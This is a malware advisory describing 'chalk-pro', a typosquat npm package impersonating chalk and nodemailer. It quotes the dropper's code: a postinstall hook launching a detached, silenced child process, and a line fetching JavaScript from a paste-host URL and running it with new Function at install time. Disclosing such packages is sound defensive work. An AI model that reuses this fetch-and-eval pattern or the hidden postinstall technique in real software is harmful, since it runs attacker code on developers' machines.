CRITICAL npm Malware

Malicious code in chalk-pro (npm)

MAL-2026-5711


Description


Source: amazon-inspector (ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce)

Package is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author.

The package.json postinstall hook runs node lib/utils/index.js, which uses child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] }) followed by child.unref() to launch lib/utils/smtp-connection/index.js as a detached, fully-silenced child, so npm install returns immediately while the dropper continues in the background.

The dropper executes require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require)) — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with new Function at install time, with full access to require. A second file (lib/utils/smtp-connection/parse.js) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex.

This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.
